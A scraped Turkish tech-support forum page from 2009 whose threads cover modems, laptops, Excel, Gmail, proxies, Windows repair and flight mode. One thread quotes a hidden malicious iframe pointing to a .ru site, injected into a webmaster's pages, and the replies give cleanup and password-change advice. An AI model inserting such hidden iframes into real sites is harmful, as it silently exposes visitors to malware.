Giriş
(3)

Vodafone 3G Modem...

paulista
ilgimi çekti acaba nasıl birşeydir.kullanan var mı acaba ? avantajlı mı ? 100 mb'ı 5 ytl diyor.sadece nette gezmek için falan nasıldır ?bütün bildikleriniz ianlatın lütfen :)
ilgimi çekti acaba nasıl birşeydir.kullanan var mı acaba ? avantajlı mı ? 100 mb'ı 5 ytl diyor.sadece nette gezmek için falan nasıldır ?

bütün bildikleriniz ianlatın lütfen :)
0
paulista
(22.08.09)
sourlemonade
(22.08.09)
4gblık paketten aşağısı pek internette bilgisayarla gezinmeye uygun gibi gelmiyor. internet siteleri zannettiğinizden fazla trafik çeker ve 100mb normal bir kullanıcının birkaç gününü almaz. almamalı en azından.

edit: eksisozluk vs gibi daha çok yazı tabanlı sitelerde gezecekseniz birkaç günü fazlasıyla geçer tabi.
0
prodeq
(22.08.09)
peki virüs olayının önüne nasıl geçebiliriz.farkında olmadan limiti aşırı geçme durumları olabilir mi ? taksimetre gibi bir program var mı acaba ?
0
🌸paulista
(22.08.09)
(1)

öyle bir laptop ki

supercalifragilisticexpialidocious
sevgili duyurganlar,öyle bir laptop istiyorum ki, iki özelliği olsun. 14.1" ekran ve hafiflik. hafiflik göreli tabii ki ama 2.5 kg üstü ağır mesela. hafifliğiyle bilinen bilgisayarlar falan vardır hani.. bunun dışında temel özellikleri en düşük seviyede olsa bile yeterli. yani en düşük seviye derken
sevgili duyurganlar,

öyle bir laptop istiyorum ki, iki özelliği olsun. 14.1" ekran ve hafiflik. hafiflik göreli tabii ki ama 2.5 kg üstü ağır mesela. hafifliğiyle bilinen bilgisayarlar falan vardır hani.. bunun dışında temel özellikleri en düşük seviyede olsa bile yeterli. yani en düşük seviye derken 4 mb ekran kartı falan kastetmiyorum tabii, günün olanakları çerçevesinde en düşük diyelim. var mıdır bir öneriniz, türkiye'den almak için nereyi, hangi internet sitesini önerirsiniz.

peşinen teşekkür ediyor, esenlikler diliyorum..


filtre: teknosa (içinde "teknosa" geçen yanıtlar otomatik olarak imha edilecektir.)
0
supercalifragilisticexpialidocious
(22.08.09)
hepsiburada'dan baktim da 14.1 ekran olan bilgisayarlar manasiz bicimde pahali, nedenini bilmiyorum. 15.4" olup hafif olan bilgisayarlar da var. isterseniz onlara da bir bakin.
0
osuruklu
(22.08.09)
(3)

Webmaster'in Bilgisi Dışında Siteye Eklenen Html Kodu

kose
web sitelerimde index.html sayfasında body tag'inin hemen altına, bilgim dışında bir kod eklenmiş. dün sitelerimden birini açtğımda google'un yasaklı site kategorisine aldığı uyarısı çıktı. siteyi komple sildim.kod şu: <iframe src="http://3e0.ru:8080/index.php" width=180 height=158 style="visibility
web sitelerimde index.html sayfasında body tag'inin hemen altına, bilgim dışında bir kod eklenmiş. dün sitelerimden birini açtğımda google'un yasaklı site kategorisine aldığı uyarısı çıktı. siteyi komple sildim.

kod şu: <iframe src="3e0.ru" width=180 height=158 style="visibility: hidden"></iframe>

bugün bir başka sitemde de bu kodu yakaladım. henüz google bilmiyor, yasaklı uyarısı çıkmadı ama sistemimde kurulu antivirüs programı (avg) deli danalar gibi uyarı vermeye başladı.

merak edip, riskleri göze alıp 3e0.ru sitesini bi ziyaret ettim (siz etmeyin!). bi araba sitesi gibi bişey, pek zararlı gözükmüyor ama yine avg dellendi. daha önce ziyaret ettiğim bi site değil.

Sorum şu acaba virüsü yedik mi? nasıl böyle kod eklenebilir siteme?

donanımhaber'de biri yine aynı dertten muzdarip olmuş.
forum.donanimhaber.com

formatı basıp, ftp şifrelerini değiştirmek çözüm olur mu yoksa sitelerimin bulunduğu serverlar mı ayvayı yemiş acep? bilemedim. ciddiyetini de anlamış değilim sorunun. ne yapsam nasıl etsem?
0
kose
(22.08.09)
bir hosting açığıdır. host işi yapıyorum bizzat ve deneyimli olarak söylüyorum bunu. gecikmeden host yöneticinizle iletişime geçin.
0
slavezix
(22.08.09)
(bkz: iframe virüs)
0
pentium100mmx
(22.08.09)
Bahsettiginiz kod bir iframe virusu ve genel kani crackli cuteftp kullanan ki$ilerin sitelerine bula$tigi yonunde ancak net bir aciklamasi yok, bu tamamen genelleme olarak yapilan bir aciklama. ismi index ve default ile ba$layan kodlara otomatik olarak bula$iyor. el ile temizleyebilirsiniz rahatlikla. dikkat etmeniz gereken kodlar index.asp/php/aspx/htm/html ve ayni uzantilarin default isminde olanlari. js lere de bula$tigi soyleniyor ancak ben sadece index ve defaulta bula$anlarina $ahit oldum. cozum uzerine yine genel kani ftp $ifrelerini degi$tirmek hatta mumkunse ftp programi kullanmaksizin explorerden ftp ye girmek, ftp yi crackli $ekilde kullanmamak, mumkunse cuteftp yi hic kullanmamak.

sorunun neden kaynaklandigini ve cozum yolunu ben de google da yaptigim ara$tirmalar sonucunda buldum, $ahsi tecrubem sadece bu viruse maruz kalmakla sinirli $imdilik ama ben de az once degi$tirdim $ifrelerimi, bakalim sonuc ne olacak.
0
independence
(22.09.09)
(4)

gmail'deki ekli resimleri önizleme

beni bana sor
gmail'in böyle bir olayı var mı acaba? yahoo, e-maillerde resim olan attachmentlar için ayrı bir klasör açıyor, buradan resimleri önzileyebiliyoruz. gmail'de ben bu sorunu bir türlü çözemedim. picasa ile de aşamadım. search options'tan "attachment" olanları seçip arattığımda dahi tek tek mailleri tı
gmail'in böyle bir olayı var mı acaba? yahoo, e-maillerde resim olan attachmentlar için ayrı bir klasör açıyor, buradan resimleri önzileyebiliyoruz. gmail'de ben bu sorunu bir türlü çözemedim. picasa ile de aşamadım. search options'tan "attachment" olanları seçip arattığımda dahi tek tek mailleri tıklamam gerekiyor. varsa bunun bir çözümü, yardım bir zahmet. thnx.
0
beni bana sor
(22.08.09)
Kendisi zaten yapıyor zaten. Ancak gelen her resimde yapmıyor bu da var. Belki resmin boyutu ile felan ilgili bir durum var.
0
guzelmarmara
(22.08.09)
Emin değilim ama şu olması lazım:

Gmail >
Ayarlar >
Genel >
Bilinmeyen kaynaktan gelen içerik: Güvenilir kişilerin gönderdiği harici içeriği (resimler gibi) her zaman göster [x]
0
oldu görüşürüz
(22.08.09)
yok aradaşlar benim demek istediğim maili açtıktan sonra görüntülenmesi değil, bilakis açmadan önzilemelerini göstermesi. yani mailin içinde görüntü olanları atıyorum "fotoğraflı olanlar" gibisinden bir ayrı klasörde göstermesi gibi bir şey. lakin gmail bunu yapmıyor sanıyorum.
0
🌸beni bana sor
(22.08.09)
bildigim kadarıyla boyle bir ozellik yok ama
labs da bir sansınızı deneyin isterseniz;
groups.google.com
0
yasaluyari
(22.08.09)
(1)

Excel'de dropdown menü ekleme

mabl
Excel 2002 var elimde. `Dropdown menü` eklemek istiyorum. Daha önce dropdownlu excel dosyaları geçti elime, onlar çalışıyor yani 2002 destekliyor dropdown olayını ama;1. Nasıl ekleyeceğim bunu bulamadım. `bilemedim ben onu`2. Diyelim bulduk ekledik. Şöyle birşey yapmak istiyorum mümkün mü?İlk sütuna
Excel 2002 var elimde. Dropdown menü eklemek istiyorum. Daha önce dropdownlu excel dosyaları geçti elime, onlar çalışıyor yani 2002 destekliyor dropdown olayını ama;

1. Nasıl ekleyeceğim bunu bulamadım. bilemedim ben onu

2. Diyelim bulduk ekledik. Şöyle birşey yapmak istiyorum mümkün mü?

İlk sütuna A, B ve C seçeneklerini ekledik diyelim. Yanındaki sütunda eğer, ilk sütunda A seçmişsek 15, 17, 19 çıksın; eğer B seçmişsek 20, 22, 24 çıksın. Anlatabilmişimdir inşallah.

Edit: Bu dropdown'ın Türkçesini de bulamadım. Bilen varsa söylesin insaniyet namına.
0
mabl
(21.08.09)
@mahallenindelisi, öncelikle teşekkürler. en azından kopyalayabileceğim dropdownlarım oldu. bu halde de iş görür büyük ölçüde ama asıl işimi kolaylaştıracak kısmı eksik hala.

bu dosyadakiler sorumun 2. kısmında sorduklarımın tam karşılığı değil. soruyu da tam açıklamamışım şimdi farkettim. ordaki verdiğim örnekte 2. sütun da dropdown olacak. Yani ilk dropdown da seçtiğimiz şeye göre 2. dropdown'da seçebileceklerimiz değişecek. İlk dropdown da A seçtiysek 2. dropdown'da 25, 30, 35 seçenekleri çıkacak mesela. Mümkün mü bu?

Bir de bu dropdown hücerelerin içeriğini nasıl değiştiriyoruz? Nerde bunun menüsü felan? Yani o J sütunundaki değerleri nasıl giriyorsun ona?
0
🌸mabl
(22.08.09)
(3)

Sapphire Ati X1800XT 256mb

karapolisnas
256MB of GDDR3Shader Model 3.0SuperAAHDTV Compatible (YPbPr)Hydravision 3RADEON X1800 XT - 625MHz Core512MB of GDDR3 - 1500 MHz MemoryDirectX® 9.0c Support and OpenGL SupportBu özelliklerde bir pci-e kart. ikinci eli 75 eder mi?
256MB of GDDR3
Shader Model 3.0
SuperAA
HDTV Compatible (YPbPr)
Hydravision 3
RADEON X1800 XT - 625MHz Core
512MB of GDDR3 - 1500 MHz Memory
DirectX® 9.0c Support and OpenGL Support

Bu özelliklerde bir pci-e kart. ikinci eli 75 eder mi?
0
karapolisnas
(21.08.09)
256 bit bu arada.
0
🌸karapolisnas
(21.08.09)
uranium fiyati su sekilde yazilmis; Oem 512 MB ATI X1800XT PCI-X 16X 22 $ 37 $

bir fikir verir sanirim. (1. si alis fiyatlari, 2. si satis) Ayrica donanimhaber forumlarinda 2. el sayfalarina bakabilirsiniz. Bu kartlardan cok satan oluyor, oradaki fiyatlarla da mukayese edersiniz.
0
entrapmen
(22.08.09)
bende x1800 gto var. 60 liraya almıştım. donanımhaber forumlarında satmak istediğimde 50-55 liraya bile insanlar pazarlık yapıyordu. etmez yani. bir de şöyle bir gerçek var. hd serisi, şimdi seri numarasını hatırlamadığım(3870 olabilir) bir kart 120 TL civarında bimeks'te sıfır, garantili, mağazadan. 512 mb, 256 bit. 75 TL x1800'e vereceklerini hiç sanmam.
0
uckac
(22.08.09)
(1)

bandwith paylaşımı

bellbane
efenim şimdi varsayalım ki bir kablosuz modemimiz ve bu modem üzerinden internete bağlanan mac adreslerini bildiğimiz 2 adet aygıt var. diyelim ki ben bir aygıta bandwith'in yüzde 80'ini diğerine de yüzde 20'sini uygun gördüm. daha fazla kullanmasınlar, bu şekilde paylaşsınlar istiyorum. bunu nasıl
efenim şimdi varsayalım ki bir kablosuz modemimiz ve bu modem üzerinden internete bağlanan mac adreslerini bildiğimiz 2 adet aygıt var. diyelim ki ben bir aygıta bandwith'in yüzde 80'ini diğerine de yüzde 20'sini uygun gördüm. daha fazla kullanmasınlar, bu şekilde paylaşsınlar istiyorum. bunu nasıl yaparım. bu arada modemin markası da linksys wag54gp2 gibi bir şey. daha önce sorulmuşsa bulamadım, affediniz.
0
bellbane
(21.08.09)
bahsettiğin şey; (bkz: qos)
nasıl yaparım diyorsan; packetman.com.au
0
roadrunner_merlin
(21.08.09)
(4)

İşe yarar Proxy sitesi

ya ben lan neyse
kullandığım proxyleri genellikle samair.ru dan alıyorum fakat proxylerin çoğu çalışmıyor. deneye deneye bazen 10 dakika aradığım oluyor.geçenlerde buradan bir arkadaş forumlarda sağlam proxylerin olduğunu söylemişti. aradım taradım bulamadım. bulduklarım üyelik istiyordu üye olmadım.acaba bildiğiniz
kullandığım proxyleri genellikle samair.ru dan alıyorum fakat proxylerin çoğu çalışmıyor. deneye deneye bazen 10 dakika aradığım oluyor.

geçenlerde buradan bir arkadaş forumlarda sağlam proxylerin olduğunu söylemişti. aradım taradım bulamadım. bulduklarım üyelik istiyordu üye olmadım.

acaba bildiğiniz hepsi, en azından çoğunluğu çalışan proxy listelerine sahip bir site var mıdır?
0
ya ben lan neyse
(21.08.09)
burdakiler çalışıyor bende:

aliveproxy.com
0
kifayetsiz pluton
(21.08.09)
proxyi yazacağınız yere

pac.byterelay.com


direk olarak bu linki yapıştırın kasmayın ip ile falan
0
buffy de vampir sayilir
(21.08.09)
ben hep bunu kullanıyorum:
proxy-list.org
alttaki alana doğrulama kodunu girince proxy listesine ulaşabilirsiniz.
0
aacwarlock
(21.08.09)
gonion
(22.08.09)
(1)

mouse'un sol tuşunun takılması

baldur2
elimdeki iki mouse'un da sol tuşuna tıkladığım zaman, sol tuş takılıyor ve geri atmıyor. yani tıklandığı gibi kalıyor. birinin markası a4, diğerinin de microsoft. bu sorun neden oluşmuştur ve kalıcı olarak düzeltilebilir mi? umarım derdimi anlatabilmişimdir.
elimdeki iki mouse'un da sol tuşuna tıkladığım zaman, sol tuş takılıyor ve geri atmıyor. yani tıklandığı gibi kalıyor. birinin markası a4, diğerinin de microsoft. bu sorun neden oluşmuştur ve kalıcı olarak düzeltilebilir mi? umarım derdimi anlatabilmişimdir.
0
baldur2
(21.08.09)
benim mouse'mda öyleydi ama kola döküldüğü içindi.Sol lopa tıklandığı zaman öyle kalıyordu.İyice silmi$tim geçmi$ti.İsterseniz sizde bir bakın belki yapı$kanlık etkisi yaratacak bir sıvı yada ona benzer bi$i kaçmı$ olabilir içine.
0
Belegg
(21.08.09)
(1)

sony dcr-hc17e pal kameradan pc'ye nasıl görüntü aktarılır?

emrag
beceremedik ya. nasıl edicez şimdi bunu? ne kablosu gerekli? hangi programları kurmalıyız?
beceremedik ya. nasıl edicez şimdi bunu? ne kablosu gerekli? hangi programları kurmalıyız?
0
emrag
(21.08.09)
bir adet firewire kablosu ve adobe premiere programı ile aktarmak mümkün.
0
bodom
(22.08.09)
(1)

Machine Debug Manager

cellar
İşletim Sistemi;Microsoft Windows XP Professional Versiyon 2002 Servis pack 3bilgisayarı her açtığımda resimde ki gibi pencere açılıyor.nedir bunun derdi? ne anlatmak istiyor? Machine Debug Manager ne demek?
İşletim Sistemi;
Microsoft Windows XP Professional Versiyon 2002 Servis pack 3

bilgisayarı her açtığımda resimde ki gibi pencere açılıyor.
nedir bunun derdi? ne anlatmak istiyor? Machine Debug Manager ne demek?
0
cellar
(21.08.09)
açılış programlarından biri çalışamıyor veya yanlış çalışıyordur. visual studio yüklüyse çıkıyor genelde. yüklü değilken çıkması garip.
0
uckac
(22.08.09)
(2)

intel q35 epress chipset

yoktanadam2
Merhaba,Ekran kartım intel q35 epress chipset.Büyük bir sorunum var. Çözünürlüğü 1440 X 900 yapamıyorum.Çıldırıcam. Bi el atın lütfen.
Merhaba,
Ekran kartım intel q35 epress chipset.
Büyük bir sorunum var. Çözünürlüğü 1440 X 900 yapamıyorum.
Çıldırıcam. Bi el atın lütfen.
0
yoktanadam2
(21.08.09)
ee...

monitörün destekliyor di mi 1440*900'ü?
0
karapolisnas
(21.08.09)
evet destekliyor.
2binlere kadar gidiyor.
0
🌸yoktanadam2
(21.08.09)
(2)

İşlemci ısınması ne zaman zararlı olur

frodox
Geçen sene aldığım 2 çekirdekli dizüstü bilgisayarım var sıcak günlerde işlemcinin sıcaklığı 67 dereceye kadar çıkıyor. Bu sıcaklık donanıma zarar verir mi? Sınır ne kadar?
Geçen sene aldığım 2 çekirdekli dizüstü bilgisayarım var sıcak günlerde işlemcinin sıcaklığı 67 dereceye kadar çıkıyor. Bu sıcaklık donanıma zarar verir mi? Sınır ne kadar?
0
frodox
(21.08.09)
o derece normal. zaten bilgisayar aşırı ısındığında farkedersin. hafif hafif donmalar, kendi kendine bir anda kapanmalar oluyosa aşırı ısınıyor demektir.
0
pragmatist kedi
(21.08.09)
gayet normal bir sıcaklık. 70-75'in üstünde pek durma bişey olmaz.
0
orion ares
(21.08.09)
(1)

Word

suleymansu
Arkadaşlar merhaba. Word 2003 Türkçe te tezle uğraşıyorum. Tez normal dikey sayfalardan oluşuyor. Araya tablolar gereği yatay sayfa yerleştiriyorum. Sayfayı yatay hale getirince word kendiliğinden sayfanın öncesine bölüm sonu ekliyor. Bölüm sonu eklenince de dipnot bu sayfadan sonra 1 den başlıyor.
Arkadaşlar merhaba. Word 2003 Türkçe te tezle uğraşıyorum. Tez normal dikey sayfalardan oluşuyor. Araya tablolar gereği yatay sayfa yerleştiriyorum. Sayfayı yatay hale getirince word kendiliğinden sayfanın öncesine bölüm sonu ekliyor. Bölüm sonu eklenince de dipnot bu sayfadan sonra 1 den başlıyor. Önceki sayfadan kaldığı yerden devam etmiyor.Dipnot özelliklerinden başlangıç numarasını değiştiriyorum ama yinede 1 den başlıyor. Birkaç gündür bu sorunu çözmek için uğraşıyorum. Yardımlarınızı bekliyorum.
0
suleymansu
(21.08.09)
dosyayi yollayin isterseniz bir bakayim. yani 3-5 sayfalik bir kisimi da olabilir.

[email protected]

butun tamirci icgudumle "gormeden bir sey diyemem" diyorum :)
0
dahicocuk
(21.08.09)
(6)

Domain

maresal jedi
Arkadaşlar sadece alan adı almak istiyorum. Önereceğiniz firmalar yabancı ya da yerli farketmez acele lütfen
Arkadaşlar sadece alan adı almak istiyorum. Önereceğiniz firmalar yabancı ya da yerli farketmez acele lütfen
0
maresal jedi
(21.08.09)
www.namecheap.com

www.moniker.com

www.isimtescil.net
0
that was just a dream
(21.08.09)
cagkan
(21.08.09)
www.ihs.com.tr
0
bakteric
(21.08.09)
network solutions ve www.godaddy.com bu konuda en eskilerdendir.
0
vejeteryan vampir
(21.08.09)
isimtescil.net iyidir.
0
tulkas
(21.08.09)
sana gkg.net'i onerebilirim.
0
pointer
(21.08.09)
(4)

<Windows root > \system32\hal.dll. hatası

komnoktatere
dün bilgisayarımız normal normal çalışırken bu sabah açtığımda <Windows root > \system32\hal.dll. hatası ile karşılaştım. dosya eksik veya bozukmuş. dosyanın kopyasını yeniden yüklemem gerekiyormuş ama benim elimde ne orjinal program cd'si nede başka birşey var. ben şuan belgelerimi kurtarma derdine
dün bilgisayarımız normal normal çalışırken bu sabah açtığımda <Windows root > \system32\hal.dll. hatası ile karşılaştım. dosya eksik veya bozukmuş. dosyanın kopyasını yeniden yüklemem gerekiyormuş ama benim elimde ne orjinal program cd'si nede başka birşey var. ben şuan belgelerimi kurtarma derdine düştüm. bi bilen varsa bi yazarsa şöyle şöyle yap belgeleri kurtar dese sonrası kolay. 'yedekleseydin' demeyin lütfen.
edit: hata notebook'da oluşmuştur.
0
komnoktatere
(21.08.09)
elimde sadece windows yüklendikten sonra oluşturulan kopya cd var.
usb bellek var ama bilgisayar tanımıyor. boş dvd var.
hata veren pc ile aynı masada duran pc den yazıyorum.
hata veren notebook yazdığım desktop
0
🌸komnoktatere
(21.08.09)
support.microsoft.com

surada adim adim anlatmis. bir deneyin.
0
dahicocuk
(21.08.09)
once en kolay yoldan bahsedeyim.

donanim ile aranizin iyi oldugunu dusunerek, nb (notebook) hdd (harddisk) 'ini desktop'a takip (sata kablosuyla) belgelerinize ulasabilirsiniz. bu sayede desktopta varolan hal.dll dosyanizi nb hdd'inizn system32 klasorune kopyalama sansiniz olacaktir.

yazilim olarak, bircok farkli sekilde yapilabilir.

bir adet windows xp bootable cd'si ile repair edilebilir. (elinizdekinin bootable winxp olup olmadigini kontrol ediniz)
(git: www.youtube.com

elinizdeki cd'nin orjinal kopya oldugu dusunulerek; Recovery Console Calismasi durumunda izlenecek yol:

Attrib -H -R -S C:\Boot.ini
DEL C:\Boot.ini
BootCfg /Rebuild
Fixboot

yukardaki islem gerceklesmedi, telasa gerek yok.

bos dvd'niz oldugunu soylediniz. bundan 2 sekilde yararlanabiliriz.

1. olan internet baglantinizla ilgili, eger hizli baglantiniz mevcutsa,

(git: perfectxp.blogspot.com)

adresten xp'yi cekiniz. dvd'te yaziniz. cd bootable olacaktir. sistem cd'den baslatip minixp'yi seciniz. sistem cd'den acilacaktir. sasirmayiniz.

burada, sisteminizden C:\WINDOWS\Driver Cache\i386 klasoru icindeki driver.RAR dosyasini aciniz.

icindeki hal.dll dosyasini extract ediniz. ve system32 dizinine kopyalayiniz.

bilgilendiriniz.
0
that was just a dream
(21.08.09)
teşekkürler teşekkürler ler er.. açıldı. her iki yoldanda yardım alarak başardım. eksik olmayın :D
0
🌸komnoktatere
(21.08.09)
(3)

touchpad'im beni terk mi ediyor yoksaaaa?

summer of 1985
sevgili ek$i duyuru ahalisi, siz bu duyuruyu okuduğunuzda ben mal mal ekrana bakıyor olacağım. o diil de bi sorun var. şöyle ki bu lanet gelesice taçped dün son kullandığımda sorunsuzdu. ama bu gün bir de ne göreyim, tıklamıyor!!! sağ tık,sol tık falan bir şekilde idare ediyoruz ancak bir nesneyi sü
sevgili ek$i duyuru ahalisi,

siz bu duyuruyu okuduğunuzda ben mal mal ekrana bakıyor olacağım. o diil de bi sorun var.

şöyle ki bu lanet gelesice taçped dün son kullandığımda sorunsuzdu. ama bu gün bir de ne göreyim, tıklamıyor!!! sağ tık,sol tık falan bir şekilde idare ediyoruz ancak bir nesneyi sürüklemek falan mimkin değil. hareket ediyo ama tıklamıyo ipne. şimdi ben bu arkadaşa veda mı edeyim, tutup kolundan servise mi götüreyim?

gereksiz not; kısa yollarla falan idare ediyorum, mouse kullanmaktan NEFRET EDİYORUM.

bi el atıverin pls,öptm, kib, bye.
0
summer of 1985
(21.08.09)
denetim masasından mouse seçeneklerini bir kontrol edin veya varsa touchpad programını kurcalayın.
0
suursuz deve
(21.08.09)
"tiklatmak icin parmakla vur" seceneginin isaretli olduguna emin misin?
0
dahicocuk
(21.08.09)
Bu sorun bende de oluyordu ve touchpad yazılımının çalışmadığını farkettim. Yazılımını tekrar çalıştır, olmuyorsa fare ayarlarından "tapping" seçeneğinin aktif olduğunu kontrol et.
0
frodox
(21.08.09)
(3)

xp yi vista ya dönüştürme. tema vs. olayında çeşitler var. hangisini indirmeli?

baba yorgun
Vista Exclusive Pack duydum. çok sorun çıkarttı dediler.transformation pack 7 duydum. daha var mı? bunların ikisinden ya da varsa diğerlerinden hangisini kurmalıyım ki sorunsuz devam etsin? ram problemim yok.(koy gitsin, vista kur dedim kendi kendime ama dvd yi bulamadığım için, xp kurmak zorunda ka
Vista Exclusive Pack duydum. çok sorun çıkarttı dediler.
transformation pack 7 duydum.

daha var mı? bunların ikisinden ya da varsa diğerlerinden hangisini kurmalıyım ki sorunsuz devam etsin? ram problemim yok.

(koy gitsin, vista kur dedim kendi kendime ama dvd yi bulamadığım için, xp kurmak zorunda kaldım. bir daha da uğraşamadım.)
0
baba yorgun
(21.08.09)
başka windows kurmayı şu an üşendiğimden dolayı düşünmüyorum :)) o dönüştürücülerle halletmeye çalışıyorum.
0
🌸baba yorgun
(21.08.09)
Hiç birini tavsiye etmem bunlar yerine uxtheme patch yapıp tema (devianart, skinbase'de bolca var) değiştirmek çok daha makul.

İlle de isterim derseniz buyrun:

1. Seven Transformation Pack 2.0: www.softpedia.com
2. VistaMizer (+Expansion Pack) 3.3.0.0: www.softpedia.com
3. Vista Transformation Pack 9.0.1: www.winxtp.com
4. BricoPack Vista Inspirat Ultimate 2: www.crystalxp.net
0
Sh0nuff
(21.08.09)
sana tavsiye edeceğim en iyi yazılım vistamizer. Kurduktan sonra bilgisayarın xp olduğu anlaşılmıyor ayrıca diğer yazılımlar gibi sistem ayarlarını kurcalamıyor gereksiz yazılımlar kurmuyor, sadece dış görünüşlerini değiştiriyor. Yani arkaplanda hiçbir yazılım çalışmıyor bu yüzden bilgisayarın performansında değişiklik olmuyor. Kaldırdığında ise tamamen eski haline dönüyor.
0
frodox
(21.08.09)
(8)

Uçuş Modu - Flight Mode

prospero
Değerli Sourlines Yolcuları,Cep telefonlarının uçuş modu/flight mode özelliğine neden izin verilmez uçaklarda? Seyahat edeceğim havayolunun çağrı merkezini arayıp bu soruyu yönelttiğimde aldığım cevap sivil havacılık kurallarına göre yasak olduğu. Ama neden yasak olduğuna dair teknik bir bilgi alama
Değerli Sourlines Yolcuları,

Cep telefonlarının uçuş modu/flight mode özelliğine neden izin verilmez uçaklarda? Seyahat edeceğim havayolunun çağrı merkezini arayıp bu soruyu yönelttiğimde aldığım cevap sivil havacılık kurallarına göre yasak olduğu. Ama neden yasak olduğuna dair teknik bir bilgi alamadım. zira cevab veremediler. Bunun mantığı nedir? Bilen açıklasın lütfen.
0
prospero
(21.08.09)
eaa.. bana bişi demediler şunca yıldır.
0
vital
(21.08.09)
sanırım herkesinkini kontrol etmek zor olacağından, tümden yasaklayarak kimsenin telefon kullanmadığından emin olmak istiyorlar.
0
vejeteryan vampir
(21.08.09)
thy ve benzerlerine özel bir durum olarak gözlemliyorum bunu. yabancı havayollarında problem yaşamıyorum. gerçi iphone ile hiç problem yaşamıyorum kontrol bile etmiyorlar.
0
ozdek
(21.08.09)
Bazı telefonlar uçak modunda da olsa 911, 112 gibi özel numaralara arama imkanı veriyor. Bu da uçuşu tehlikeye sokar. Uçuş modundayım bana bir şey olmaz deyip 911'i arayabilirsiniz yanlışlıkla.

Ha, bunun yasakla alakası olduğunu sanmıyorum. Klasik "kontrol edemiyorsan öldür" mantığı.
0
ataturkiye
(21.08.09)
bende defalarca kullandim, yurtici ve yurtdisi yolculuklarda kimse bisey demedi..
hic ilgilenme bile bence flight mode on oldugundan emin ol tak kulakligini devam et bosver..
0
allan quatermain
(21.08.09)
Ben de sadece THY'de bunun sorun edildigini gordum. Yabanci havayollari flight mode kullanimina izin veriyor.

Ha sadece inis/kalkis sirasinda izin verilmiyor olabilir; o da o sirada hicbir elektronik aletin calistirilmasina izin verilmedigi icin.
0
wpi
(21.08.09)
sadece cep telefonu degil, kalkis esnasinda herhangi bir elektronik aletin(psp, mp3 player falan) calismasina izin verilmiyor, ayni sebeptendir buyuk ihtimalle.

(bkz: interference)
0
osuruklu
(21.08.09)
cevab veren tüm arkadaşlara teşekkür ederim. iniş kalkış sırasında hiçbir elektronik aletin kullanımına izin verilmediğini tabi ki biliyor ve anlıyorum. uçak, uçuş irtifasına ulaştıktan sonra, kemer ışıkları söndüğünde falan diğer elektronik cihazlar kullanılabiliyor fakat uçuş modu hala yasaktır diye duyuru yapılıyor. kontrol edemiyorsan yasakla mantığı benim de ilk aklıma gelen gerekçeydi.
0
🌸prospero
(30.08.09)
(3)

çamaşır yıkamak isteyen erkek modeli - arçelik 3340s kullanımı?

p shadow
öncelikle tekrar belirteyim belki bi üretici görür;ERKEKLER İÇİN ÇAMAŞIR MAKİNESİ İSTİYORUZ!anneye anlatır gibi değil babaya anlatır gibi anlatmanız lazım, şu an tek başıma yazlıktayım, makineyi alan babam, ve babam da nasıl kullanılcağını bilmiyor.. hep birilerine yıkatmış.. benim de öğrenci evimde
öncelikle tekrar belirteyim belki bi üretici görür;
ERKEKLER İÇİN ÇAMAŞIR MAKİNESİ İSTİYORUZ!
anneye anlatır gibi değil babaya anlatır gibi anlatmanız lazım, şu an tek başıma yazlıktayım, makineyi alan babam, ve babam da nasıl kullanılcağını bilmiyor.. hep birilerine yıkatmış.. benim de öğrenci evimde kullandığım makina çok daha gzel.. böyle sentetik 30 yazıyo mesela, basıyosun sentetik kumaşlar için ayarlı programda 30 derecede yıkıyor? bakın erkek makinesi sayılır..

bu makineyse latin harflerine yeni geçmiş uzay mekiği gibi..
sadece bi kaç tshirt boxer falan yıkıycam yahu..
şimdi şu fotoda görülen ayarda ben deterjan falan koysam bassam düğmeye makine patlamaz değil mi? peki çamaşırlarım da beni görecek mi?

aslında külle yıkamayı öğrenmek gerek..

edit: foto.. yuh.. koymayı unutmuşum lan..
0
p shadow
(21.08.09)
fotoğraf gözükmüyor sanki :) o da gelsin bakalım bi. ancak makina benim evdekine çok benziyor sadece program ayarlama düğmesi farklı. G modunda 30-40 derece arasında yıkayabilirsiniz. sadece sağdaki ayar düğmesini g' ye sıcaklığı da 30 dereceye ayarlayın gerisini o ayarlasın. deterjanı ortadakine koyacaksınız bu programda sadece.45 dk sürüyordu en son.

edit: fotoğraf gelmiş tamam ama G yazan olduğuna inanıyorum ben halen sizinkinde g'nin üzerine garip bir işaret koymuş olsa da :)
0
prodeq
(21.08.09)
bir de sayet kullanma kilavuzu varsa orada o harflerin ne manaya geldigi yaziyor. ben zamani vaktiyle oradaki harflerin manalarina baka baka yikiyordum camasirlari. niyeyse hic aklimda kalmamis, gercekten erkeklere yonelik camasir makinesi yapilmasi gerek.
0
entrapmen
(21.08.09)
g rulez! bir erkek olarak bildiğim "c" var uzun program, hiç bulaşılmaması gereken, bir de "g" var ki, senin benim dostumuz. o herşeyi bilendir.
ayrıca bu tür durumlarda ben duşa girdiğimde aradan 3er 5ewr çıkartırım baksırı tişörtü. hele bir de onları şampuanla yıkayıp, sanki bir ırmakta çamaşır yıkarcasına, ayağımla dövdüğüm kısım en sevdiğim:) tavsiye ederim.
0
outlawrider
(21.08.09)
(9)

araç içi kamera

ikinoktayedi
Bu dallamaları izleyince aklıma geldi de; http://www.facebook.com/video/video.php?v=245144840496&ref=mf Magandaların cirit attığı trafikte bi nevi karakutu olacağını düşündüğüm bir sistem nasıl yapabilirim. Ön cam içine monte edilebilen (navigasyon sis. gibi)Ben adam gibi yolumda giderken böylelerin
Bu dallamaları izleyince aklıma geldi de; www.facebook.com
Magandaların cirit attığı trafikte bi nevi karakutu olacağını düşündüğüm bir sistem nasıl yapabilirim. Ön cam içine monte edilebilen (navigasyon sis. gibi)
Ben adam gibi yolumda giderken böylelerinin plakalarını filan net kaydedebilecek çözünürlükte olacak.
Dijital fotoğraf makinası alsam içine 8gb filan kart taksam, şarjını nasıl ayarlarım, çakmak girişine bağlamak mümkün değildir herhalde.
Şehir içinde 30 dakika kaydetse yeter, hafızası dolunca silip tekrar kullanırım.

önerisi olan ya da böyle bişey yapmış olup da kullanan var mı?

ek olarak: diyelim ki böyle bir kazayı kaydettim, polise bunu versem ilgilenirler mi? adamı bulup ceza yazarlar mı?
0
ikinoktayedi
(21.08.09)
Piç kurulari!!!

Kusura bakmayin birkac gun once trafikte benzer bir olay yasadigim icin sinirim cok taze.

